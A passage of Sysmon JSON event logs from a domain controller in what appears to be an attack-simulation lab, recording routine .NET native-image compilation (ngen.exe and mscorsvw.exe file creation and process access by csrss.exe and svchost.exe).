05:59:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7565,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:42.106\r\nProcessGuid: {A837DB8D-04CD-5F25-0000-0010C9D11000}\r\nProcessId: 3552\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\de0-0\\System.Management.Instrumentation.dll\r\nCreationUtcTime: 2020-08-01 05:59:42.106","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:42.106","ProcessGuid":"{A837DB8D-04CD-5F25-0000-0010C9D11000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\de0-0\\System.Management.Instrumentation.dll","CreationUtcTime":"2020-08-01 05:59:42.106","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7566,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.137\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010F3C20E00}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.137","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010F3C20E00}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7567,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.137\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010F3C20E00}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.137","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010F3C20E00}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7568,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.153\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00106AD51000}\r\nTargetProcessId: 1296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.153","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00106AD51000}","TargetProcessId":"1296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7569,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.200\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-0010E9D81000}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.200","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-0010E9D81000}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7570,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.200\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-0010E9D81000}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.200","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-0010E9D81000}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7571,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.200\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-0010E9D81000}\r\nTargetProcessId: 1476\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.200","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-0010E9D81000}","TargetProcessId":"1476","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7572,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:42.606\r\nProcessGuid: {A837DB8D-04CE-5F25-0000-0010E9D81000}\r\nProcessId: 1476\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c4-0\\System.Messaging.dll\r\nCreationUtcTime: 2020-08-01 05:59:42.606","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:42.606","ProcessGuid":"{A837DB8D-04CE-5F25-0000-0010E9D81000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\5c4-0\\System.Messaging.dll","CreationUtcTime":"2020-08-01 05:59:42.606","EventReceivedTime":"2020-08-01 05:59:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7573,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:42.653\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0495-5F25-0000-0010431F0F00}\r\nTargetProcessId: 632\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:42.653","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0495-5F25-0000-0010431F0F00}","TargetProcessId":"632","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NE